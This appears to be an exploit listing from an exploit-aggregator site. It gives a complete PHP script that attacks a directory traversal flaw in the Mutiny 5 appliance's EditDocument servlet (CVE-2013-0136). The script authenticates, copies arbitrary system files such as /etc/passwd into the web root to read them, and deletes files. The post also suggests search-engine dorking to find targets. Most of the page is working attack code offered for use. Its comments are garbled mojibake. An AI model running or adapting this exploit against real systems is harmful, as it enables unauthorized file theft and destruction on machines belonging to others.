Share
## https://sploitus.com/exploit?id=PACKETSTORM:214910
=============================================================================================================================================
| # Title : Mutiny 5.0-1.07 directory traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.mutiny.com/downloads/ |
=============================================================================================================================================
POC :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] Code Description: The code is an exploit written in PHP that targets a vulnerability in the Mutiny 5 Appliance,
allowing an authenticated attacker (i.e. with a username and password) to read or delete any file on the system due to a Directory Traversal vulnerability in the EditDocument servlet.
(Related : https://packetstorm.news/files/id/180894/ Linked CVE numbers: CVE-2013-0136 ) .
[+] save code as poc.php.
[+] Set taget : Line 110.
[+] USage : php poc.php
[+] PayLoad :
<?php
class MutinyExploit {
private $target;
private $username;
private $password;
private $session;
public function __construct($target, $username, $password) {
$this->target = rtrim($target, '/');
$this->username = $username;
$this->password = $password;
}
private function sendRequest($url, $postFields = null, $cookie = null) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
if ($postFields) {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
}
if ($cookie) {
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: $cookie"]);
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
public function login() {
// ุงูุญุตูู ุนูู JSESSIONID ุงูุฃููู
$response = $this->sendRequest("{$this->target}/interface/index.do");
if (preg_match('/JSESSIONID=(.*?);/', $response, $matches)) {
$firstSession = $matches[1];
} else {
die("ูุดู ูู ุงูุญุตูู ุนูู JSESSIONID ุงูุฃููู\n");
}
// ู
ุญุงููุฉ ุชุณุฌูู ุงูุฏุฎูู
$postFields = "j_username={$this->username}&j_password={$this->password}";
$response = $this->sendRequest("{$this->target}/interface/j_security_check", $postFields, "JSESSIONID=$firstSession");
// ุงูุชุญูู ู
ู
ุง ุฅุฐุง ูุงู ุชุณุฌูู ุงูุฏุฎูู ูุงุฌุญูุง
if (strpos($response, "interface/index.do") === false) {
die("ูุดู ุชุณุฌูู ุงูุฏุฎููุ ุชุญูู ู
ู ุจูุงูุงุช ุงูุงุนุชู
ุงุฏ\n");
}
// ุงูุญุตูู ุนูู JSESSIONID ุงูููุงุฆู ุจุนุฏ ุงูู
ุตุงุฏูุฉ
$response = $this->sendRequest("{$this->target}/interface/index.do", null, "JSESSIONID=$firstSession");
if (preg_match('/JSESSIONID=(.*?);/', $response, $matches)) {
$this->session = $matches[1];
echo "ุชู
ุชุณุฌูู ุงูุฏุฎูู ุจูุฌุงุญ\n";
} else {
die("ูุดู ูู ุงูุญุตูู ุนูู ุงูุฌูุณุฉ ุจุนุฏ ุชุณุฌูู ุงูุฏุฎูู\n");
}
}
public function readFile($filePath) {
echo "ูุณุฎ ุงูู
ูู ุฅูู ู
ููุน ููุจ ูู
ูู ุงููุตูู ุฅููู...\n";
$dstPath = "/usr/jakarta/tomcat/webapps/ROOT/m/";
$postFields = [
'operation' => 'COPY',
'paths[]' => "../../../../{$filePath}%00.txt",
'newPath' => "../../../..{$dstPath}"
];
$response = $this->sendRequest("{$this->target}/interface/EditDocument", $postFields, "JSESSIONID={$this->session}");
if (strpos($response, '{"success":true}') !== false) {
echo "ุชู
ูุณุฎ ุงูู
ูู ุฅูู {$dstPath} ุจูุฌุงุญ\n";
} else {
die("ูุดู ูู ูุณุฎ ุงูู
ูู\n");
}
// ูุฑุงุกุฉ ุงูู
ูู
echo "ุงุณุชุฑุฌุงุน ู
ุญุชูู ุงูู
ูู...\n";
$fileContents = $this->sendRequest("{$this->target}/m/" . basename($filePath));
if ($fileContents) {
file_put_contents("extracted_" . basename($filePath), $fileContents);
echo "ุชู
ุงุณุชุฑุฌุงุน ุงูู
ูู ูุญูุธู ู
ุญูููุง\n";
} else {
echo "ูุดู ูู ุงุณุชุฑุฌุงุน ู
ุญุชูู ุงูู
ูู\n";
}
// ุชูุธูู ุงูู
ููุงุช ุจุนุฏ ุงููุฑุงุกุฉ
$this->deleteFile("{$dstPath}" . basename($filePath));
}
public function deleteFile($filePath) {
echo "ุญุฐู ุงูู
ูู {$filePath}\n";
$postFields = [
'operation' => 'DELETE',
'paths[]' => "../../../../{$filePath}"
];
$response = $this->sendRequest("{$this->target}/interface/EditDocument", $postFields, "JSESSIONID={$this->session}");
if (strpos($response, '{"success":true}') !== false) {
echo "ุชู
ุญุฐู ุงูู
ูู ุจูุฌุงุญ\n";
} else {
echo "ูุดู ูู ุญุฐู ุงูู
ูู\n";
}
}
}
// ุงุณุชุฎุฏุงู
ุงูููุฏ
$exploit = new MutinyExploit("http://target.com", "superadmin@mutiny.com", "password");
$exploit->login();
$exploit->readFile("/etc/passwd"); // ู
ุซุงู ุนูู ูุฑุงุกุฉ ู
ูู
// $exploit->deleteFile("/tmp/test.txt"); // ุญุฐู ู
ูู (ุงุฎุชูุงุฑู)
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================